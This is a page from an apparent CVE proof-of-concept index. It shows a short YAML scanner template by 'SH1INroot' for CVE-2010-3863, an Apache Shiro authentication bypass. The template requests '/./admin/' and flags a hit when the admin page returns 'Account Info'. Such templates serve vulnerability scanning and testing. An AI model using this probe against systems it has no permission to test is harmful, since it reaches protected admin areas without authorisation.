4837 Total CVEs
26 Years
GitHub
README.md
README.md not found for CVE-2010-3863. The file may not exist in the repository.
POC / poc.yml YML
name: cve-2010-3863
transport: http
rules:
  - method: GET
    path: /./admin/
    follow_redirects: false
    headers:
      Content-Type: application/x-www-form-urlencoded
    expression: |
      status==200 && response.body.bcontains(b'Account Info')
detail:
  author: SH1INroot
  links:
    - https://github.com/sh1inroot-alt/shiro-cve-2010-3863